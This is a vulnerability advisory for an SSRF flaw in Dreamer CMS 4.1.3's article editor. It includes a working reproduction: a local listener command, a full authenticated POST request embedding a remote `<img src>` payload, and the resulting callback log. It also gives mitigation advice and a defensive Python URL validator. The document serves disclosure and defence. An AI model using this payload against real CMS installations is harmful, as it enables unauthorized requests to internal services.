CVE-2025-1548 - Remote File Inclusion (RFI) Vulnerability In Article Editor Image Upload Functionality of Dreamer CMS 4.1.3

Description:

A Remote File Inclusion (RFI) vulnerability exists in the image upload functionality of the article editor (编辑文章) in Dreamer CMS 4.1.3. The vulnerability arises because the application allows users to embed `<img>` elements with arbitrary remote `src` values through the article editor (编辑文章). An attacker can exploit this functionality to force the server to make unauthorized requests to external targets, potentially exposing sensitive information or enabling further attacks.

Affected Component:

  • Endpoint: POST /admin/archives/edit
  • Application Version: 4.1.3

Type of Vulnerability:

CWE-918: Server-Side Request Forgery (SSRF)

Impact:

  • Unauthorized Internal Access: Attackers can access internal services or network-restricted endpoints through SSRF.

Steps to Reproduce / PoC:

  1. Start a Python web server on the attacker machine, accessible at: http://127.0.0.1:4444
    python3 -m http.server 4444
  2. After authenticating to the backend, make a POST request with Burp containing an `<img>` whose `src` loads from an arbitrary URL.
    POST /admin/archives/edit HTTP/1.1
    Host: localhost:8888
    Content-Length: 1756
    Pragma: no-cache
    Cache-Control: no-cache
    sec-ch-ua: "Not A(Brand";v="8", "Chromium";v="132"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Linux"
    Accept-Language: en-US,en;q=0.9
    Origin: http://localhost:8888
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0xgAcparCLsGBBEz
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: iframe
    Referer: http://localhost:8888/admin/archives/toEdit?id=07d10ba665644d40ba558b0fe3d4831f&cid=2512e4593b514db2a10841cbc8a63a23
    Accept-Encoding: gzip, deflate, br
    Cookie: Hm_lvt_cd8218cd51f800ed2b73e5751cb3f4f9=1737869223; studentUserName=student; adminUserName=admin; dreamer-cms-s=6fdd504a-59e3-4a6b-9808-aabe821b1e76
    Connection: keep-alive

    ------WebKitFormBoundary0xgAcparCLsGBBEz
    Content-Disposition: form-data; name="id"

    07d10ba665644d40ba558b0fe3d4831f
    ------WebKitFormBoundary0xgAcparCLsGBBEz
    Content-Disposition: form-data; name="fid"

    b978ae1d04754e2686397489391cbb53
    ------WebKitFormBoundary0xgAcparCLsGBBEz
    Content-Disposition: form-data; name="categoryId"

    2512e4593b514db2a10841cbc8a63a23
    ------WebKitFormBoundary0xgAcparCLsGBBEz
    Content-Disposition: form-data; name="categoryIds"

    .4ol61bbh.mvpeun1s
    ------WebKitFormBoundary0xgAcparCLsGBBEz
    Content-Disposition: form-data; name="imagePath"


    ------WebKitFormBoundary0xgAcparCLsGBBEz
    Content-Disposition: form-data; name="answer"

    <p><img src="http://127.0.0.1:4444/"/></p>
    ------WebKitFormBoundary0xgAcparCLsGBBEz
    Content-Disposition: form-data; name="title"

    梦想家项目如何在本地搭建环境?
    ------WebKitFormBoundary0xgAcparCLsGBBEz
    Content-Disposition: form-data; name="weight"

    0
    ------WebKitFormBoundary0xgAcparCLsGBBEz
    Content-Disposition: form-data; name="clicks"

    9
    ------WebKitFormBoundary0xgAcparCLsGBBEz
    Content-Disposition: form-data; name="file"; filename=""
    Content-Type: application/octet-stream


    ------WebKitFormBoundary0xgAcparCLsGBBEz
    Content-Disposition: form-data; name="description"


    ------WebKitFormBoundary0xgAcparCLsGBBEz
    Content-Disposition: form-data; name="comment"

    1
    ------WebKitFormBoundary0xgAcparCLsGBBEz
    Content-Disposition: form-data; name="subscribe"

    1
    ------WebKitFormBoundary0xgAcparCLsGBBEz
    Content-Disposition: form-data; name="status"

    1
    ------WebKitFormBoundary0xgAcparCLsGBBEz
    Content-Disposition: form-data; name="editorValue"

    <p><img src="http://127.0.0.1:4444/"/></p>
    ------WebKitFormBoundary0xgAcparCLsGBBEz--

  3. Observe a request arriving at the attacker-controlled Python web server when the admin revisits the same article in the editor via the frontend.
    127.0.0.1 - - [xx/xxx/xxxx xx:xx:xx] "GET / HTTP/1.1" 200 -

Root Cause:

The application does not validate or sanitize the user-provided URL supplied in the embedded element's `src` attribute. This lack of restriction allows an attacker to supply an arbitrary URL, leading to SSRF.

Mitigation Recommendations:

  1. Input Validation:

    • Restrict the allowed URLs to trusted domains using a whitelist.
  2. Network Restrictions:

    • Configure the backend to restrict outbound requests to necessary domains and block access to internal/private IP ranges.
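Both mitigations above, combined in one server-side check, as an added Python example that is not part of Dreamer CMS (the allowlisted hostname, the regex-based `<img>` extraction and the injectable resolver are assumptions; the sample editor content is taken from the PoC):

```python
import ipaddress
import re
import socket
from urllib.parse import urlparse

# Assumed allowlist of hosts the CMS may load article images from (not a Dreamer CMS setting).
ALLOWED_IMAGE_HOSTS = {"cdn.example.com"}

# Minimal <img src=...> extractor for the demonstration; production code should run the
# submitted HTML through a real sanitizer (e.g. jsoup Safelist on the Java side), not a regex.
IMG_SRC_RE = re.compile(r'<img\b[^>]*?\bsrc\s*=\s*["\']([^"\']*)["\']', re.IGNORECASE)


def default_resolve(host):
    """Resolve host to the set of IP strings it maps to; empty set on failure (fail closed)."""
    try:
        return {info[4][0] for info in socket.getaddrinfo(host, None)}
    except socket.gaierror:
        return set()


def is_internal(addr):
    """Loopback, RFC 1918/ULA, link-local, reserved, multicast and unspecified addresses."""
    ip = ipaddress.ip_address(addr)
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def is_allowed_image_url(url, allowed_hosts=ALLOWED_IMAGE_HOSTS, resolve=default_resolve):
    """Allowlist check (mitigation 1) followed by an internal-range check (mitigation 2)."""
    parsed = urlparse(url.strip())
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False
    # Allowlist first: an IP literal such as 127.0.0.1 never matches a hostname allowlist.
    if parsed.hostname.lower() not in allowed_hosts:
        return False
    # Even an allowlisted name must not resolve into internal ranges (misconfig or DNS rebinding).
    addrs = resolve(parsed.hostname)
    return bool(addrs) and not any(is_internal(a) for a in addrs)


def find_disallowed_img_srcs(editor_html, **kwargs):
    """Return every <img src> in submitted editor content that fails validation; reject the
    whole submission (or strip the element) if this list is non-empty."""
    return [src for src in IMG_SRC_RE.findall(editor_html)
            if not is_allowed_image_url(src, **kwargs)]


# Constructed sample: the editorValue field from the PoC above.
SAMPLE_EDITOR_VALUE = '<p><img src="http://127.0.0.1:4444/"/></p>'
```

The resolution check only covers the moment of validation; the outbound network restriction from mitigation 2 must still be enforced where the request is actually made.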

References: